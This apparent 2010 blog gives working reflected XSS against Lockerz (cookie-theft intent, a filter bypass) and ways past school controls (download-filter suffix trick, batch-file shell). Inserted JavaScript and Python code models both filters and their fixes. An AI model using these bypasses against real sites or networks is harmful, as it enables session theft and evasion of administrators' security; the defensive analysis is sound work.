20 Feb 2010 at 17:49
Angelo
Uncategorized
No Comments
Lockerz has a major exploit in its redeem page. (Note: you can only get there while the redeem page is up.)
http://ptzplace.lockerz.com/welcome.php?m=f&e=” onMouonMouseOverseOver=alert(document.cookie); bullshit=”
You can see the page falls through to the Failed to Login page and echoes the e parameter into the username field. You can hijack the <input> tag by closing off its value attribute with a "-character and then putting your code after it. onMouseOver is filtered out, but the filter only runs once, so you write something like onMoonMouseOveruseOver: the filter removes the copy in the middle of the word and the two halves merge back together into onMouseOver. After that you can't use any further "-characters, because the page always puts a \ in front of them (a \" still ends the HTML attribute, since backslash means nothing in HTML, but it breaks a JavaScript string literal). To build strings inside the handler, use String.fromCharCode(chrCode1, chrCode2, chrCode3, ...) instead. It's that easy!
I’ve crafted a URL that sends the users’ cookie to my server as soon as their mouse hovers over the username field. This has proven to actually work, even when users are logged in to PtzPlace.
Note: I will be posting more of these blog posts.
Update: I think Lockerz fixed this. Haven’t got a confirmation though.
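As an added example (not code from the original post or from Lockerz), here is a model of the two filters the post infers on the e parameter, why each fails, and the encoding that would have closed the hole. The server-side behaviour is reconstructed from the post's description; the function names, the dummy attribute x and the alert payload are assumptions for illustration.

```javascript
// Added example, not from the original post: a model of the filters the
// post describes on welcome.php's "e" parameter, the bypass for each, and
// the encoding that closes the hole. The server code is an assumption
// built from the post's observations; only the behaviour is taken from it.

// Filter 1: strip the literal token "onMouseOver" once, non-recursively.
// Filter 2: put a backslash before every double quote (addslashes-style).
function lockerzStyleFilter(value) {
  return value.replace(/onmouseover/i, "").replace(/"/g, '\\"');
}

// The failed-login page echoes the (filtered) value into the username field.
function renderUsernameField(filterFn, value) {
  return '<input type="text" name="e" value="' + filterFn(value) + '">';
}

// Nest a second copy of the token inside the first. A single-pass strip
// removes the inner copy and the outer halves re-join into the token.
function doubledToken(token, splitAt) {
  return token.slice(0, splitAt) + token + token.slice(splitAt);
}

// Double quotes get a backslash, so string literals inside the injected
// handler are built with String.fromCharCode instead, as the post suggests.
function jsStringLiteral(text) {
  const codes = Array.from(text, ch => ch.charCodeAt(0)).join(",");
  return "String.fromCharCode(" + codes + ")";
}

// The injected value: a quote to close value="...", the doubled handler,
// then a dummy attribute (x, standing in for the post's "bullshit") that
// swallows the closing quote the template appends.
function buildPayload(handlerJs) {
  return '" ' + doubledToken("onMouseOver", 5) + "=" + handlerJs + ' x="';
}

// Minimal quote-aware scanner for one tag: returns the attribute names a
// browser would see. Backslash is not an escape in HTML, so \" still ends
// the attribute. Not a full HTML parser.
function attributeNames(tag) {
  const names = [];
  const end = tag.lastIndexOf(">");
  let i = tag.indexOf(" ");
  while (i >= 0 && i < end) {
    while (i < end && /\s/.test(tag[i])) i++;
    if (i >= end) break;
    let name = "";
    while (i < end && !/[\s=]/.test(tag[i])) name += tag[i++];
    names.push(name);
    while (i < end && /\s/.test(tag[i])) i++;
    if (tag[i] === "=") {
      i++;
      while (i < end && /\s/.test(tag[i])) i++;
      const q = tag[i];
      if (q === '"' || q === "'") {
        i = tag.indexOf(q, i + 1);      // quoted value runs to the next same quote
        i = i < 0 ? end : i + 1;
      } else {
        while (i < end && !/\s/.test(tag[i])) i++;  // unquoted value runs to whitespace
      }
    }
  }
  return names;
}

// The fix: encode for the HTML attribute context instead of blacklisting
// event names and escaping quotes for a different (SQL/JS) context.
function htmlAttrEncode(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return value.replace(/[&<>"']/g, ch => map[ch]);
}

const payload = buildPayload("alert(" + jsStringLiteral("xss") + ")");
const vulnerable = renderUsernameField(lockerzStyleFilter, payload);
const fixed = renderUsernameField(htmlAttrEncode, payload);
```

Running attributeNames over vulnerable shows onMouseOver and x appearing as live attributes despite both filters, while the entity-encoded version keeps the whole payload inside the value attribute.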
19 Feb 2010 at 21:10
Angelo
Uncategorized
No Comments
System administrators block certain file types in network traffic or in your documents folders. Below are a few that are often forgotten.
- PIF – Shortcut to MS-DOS Program (Windows runs it as an executable, just like an EXE) This was a new discovery for me too, actually…
- HTA – HTML Application (HTML, but run by mshta.exe with the full permissions of the user instead of in the browser sandbox)
- JSE – JScript Encoded Script File (an encoded JS file; runs the same)
- VBE – VBScript Encoded Script File (an encoded VB/VBS file; runs the same)
- WSF – Windows Script File (an XML wrapper that can contain multiple scripts, in different script languages)
- LNK – Shortcut (This is likely to be blocked, though)
- SCR – Screensaver (This is likely to be blocked, though)
- URL – Shortcut (This is likely to be blocked, though)
And that’s most of them. There’s a full list here.
10 Feb 2010 at 17:40
Angelo
Uncategorized
No Comments
I know, I know, everybody already knows how to do this. Either use proxies or use the IPs. Not many people know how to visit a site by its IP, though, so here's a quick guide.
- Go to http://network-tools.com/
- Check the Ping field.
- Enter the website you want to "unblock" in the field below, which shows your own IP address by default. Just enter a domain, for example: www.yoyogames.com
- Click on GO!
- You will see something similar to this:
Ping 78.129.196.206
[www.yoyogames.com]
- Copy and paste the IP address, and put it in your browser URL bar like this: http://78.129.196.206/
And that's it. One caveat: a server that hosts several sites picks the site from the Host header your browser sends, and by IP that header is just the address, so you may get a default page instead of the site you wanted; over HTTPS the certificate won't match the IP either, so expect a warning.
I know I haven’t posted a lot in a while and this is a fairly simple post. That is because I’m preparing for a much bigger blog post coming up in the next few days. Stay tuned. It’s gonna be an interesting read.
Edit: Or not. Depends..
05 Feb 2010 at 10:48
Angelo
School computers
2 Comments
At our school, there is a protection against file extensions you can download. For example, everything ending with .exe or .bat gives the following error:

Taking a look at the following URL, which obviously doesn't exist, gives the same error as above: http://www.google.com/thisfiledoesnotexist.exe
That means the filter simply checks whether the requested URL ends with ".exe" and blocks it if so, which is easily bypassed: adding a question mark (?) to the end of the URL lets us download the blocked file type, because the filter no longer sees ".exe" at the end of the URL while the web server ignores the empty query string. Unfortunately, IE7 won't offer to run an executable downloaded this way, only to save it, so with IE7 you can only use this for batch files. (Edit: You might want to try adding ?.pif to the end of the URL for EXE files.) Take a look at the screenshot below, which is a batch file downloaded by adding a ? to the end of the URL:

You can see, it's dead simple. This also brings me to the next point: getting a command prompt, not by running the "cmd" executable itself, but by crafting a special batch file that imitates the command prompt's features. The following code is all that is needed:
@echo off
cls
:RTN
rem Show a ">" prompt and read one line of input into the variable cmd
SET /P cmd=^>
rem Run that line as a command, then loop back for the next one
%cmd%
goto RTN
rem Never reached: the loop above runs until the window is closed
pause
So that's it, the basics of downloading blocked file extensions. Of course you can also set up your own server with a PHP script that sends an executable as an octet-stream under a harmless file name, but I'm not gonna go into depth on that.
System admins, be warned: people can do all kinds of stuff to your computers!
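As an added example (not code from the original posts or from the school's filter), here is a model of the URL-suffix check this post reverse-engineers, beside a hardened check that also covers the forgotten extensions from the 19 Feb 2010 post above and the Content-Disposition trick mentioned at the end of this one. The filter's internals, the blocklist contents beyond what the posts name, and the example.test URLs are assumptions for illustration.

```python
# Added example, not from the original posts: a model of the URL-suffix
# download filter this post reverse-engineers, beside a hardened version
# that also covers the "forgotten" extensions from the 19 Feb 2010 post.
# The filter's internals are an assumption built from the post's
# observations; only the observed behaviour is taken from the page.
import posixpath
import re
from urllib.parse import unquote, urlparse

# What the post says the school filter blocks.
SCHOOL_BLOCKLIST = frozenset({".exe", ".bat"})

# The school list plus the extensions the 19 Feb post says admins forget.
FULL_BLOCKLIST = SCHOOL_BLOCKLIST | {
    ".pif", ".hta", ".jse", ".vbe", ".wsf", ".lnk", ".scr", ".url",
    ".cmd", ".com", ".js", ".vbs",   # assumed: plain siblings of the above
}


def weak_is_blocked(url, blocked=SCHOOL_BLOCKLIST):
    """The check the post infers: does the raw request URL end with a
    blocked extension?  Any query string ('?', '?.pif', '?x=1') hides the
    real suffix, and the web server just ignores the extra query."""
    return any(url.lower().endswith(ext) for ext in blocked)


def extension_of(filename):
    """Extension as Windows will see it once the file is saved: trailing
    dots and spaces are dropped by the file system, case is ignored, and a
    name that is only an extension (".exe") still runs as an executable."""
    name = filename.rstrip(". ").lower()
    _, ext = posixpath.splitext(name)
    if not ext and name.startswith("."):
        ext = name
    return ext


def hardened_is_blocked(url, blocked=FULL_BLOCKLIST):
    """Decide on the decoded path component only, never on the raw URL:
    urlparse drops query and fragment, unquote turns %2E into '.', and the
    last path segment is what the browser proposes as the file name."""
    path = unquote(urlparse(url).path)
    return extension_of(posixpath.basename(path)) in blocked


_CD_FILENAME = re.compile(r'filename\*?\s*=\s*"?([^";]+)"?', re.IGNORECASE)


def content_disposition_blocked(headers, blocked=FULL_BLOCKLIST):
    """URL checks alone are still bypassable, as the post notes: a PHP
    script on your own server can stream any bytes as
    application/octet-stream under a harmless path and name the file in
    Content-Disposition.  A filtering proxy has to check that name too."""
    match = _CD_FILENAME.search(headers.get("Content-Disposition", ""))
    if not match:
        return False
    name = match.group(1).strip()
    if name.lower().startswith("utf-8''"):      # RFC 5987 encoded form
        name = unquote(name[7:])
    return extension_of(posixpath.basename(name)) in blocked


if __name__ == "__main__":
    for url in ("http://www.google.com/thisfiledoesnotexist.exe",
                "http://www.google.com/thisfiledoesnotexist.exe?",
                "http://www.google.com/thisfiledoesnotexist.exe?.pif",
                "http://example.test/tool.pif"):
        print(f"{url:55} weak={weak_is_blocked(url)!s:5} "
              f"hardened={hardened_is_blocked(url)}")
```

The weak check passes the "?" and "?.pif" URLs straight through, and it has never heard of .pif at all; the hardened check catches all of them because it looks at the decoded path and at what Windows will actually do with the saved name, and the Content-Disposition check closes the octet-stream route the post ends on.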
04 Feb 2010 at 18:00
Angelo
Uncategorized
3 Comments
Hello there! You might wonder (or not) what happened to my blog. Well, don't worry. I still have a database backup. If you want to see an old post, just post a comment on this article.
So what happened? There are too many system admins doing their work wrong. You might know what I mean with that, or if you don’t, here’s a list:
- They block certain sites.
- They install a filter that disallows downloading of certain filetypes.
- They make all users non-admin users to disallow installation of programs onto the computer.
- They force us to use the worst web browser ever. (You know which one I mean.)
- They automatically remove all executables, batch files, rar and zip files, etc.
And more. All nice things to do, but usually there are too many flaws in these security measures. I will cover all of the above points and more in future blog posts, so stay tuned.
Remember, this blog is not about hacking. It’s about pointing out the flaws IT professionals often make on their computer networks.
11 Oct 2009 at 14:38
Angelo
Uncategorized
No Comments
Ok guys, as I found it extremely hard to achieve this, I want to share how I finally managed to get it working.
Here’s a tutorial!
Continue reading →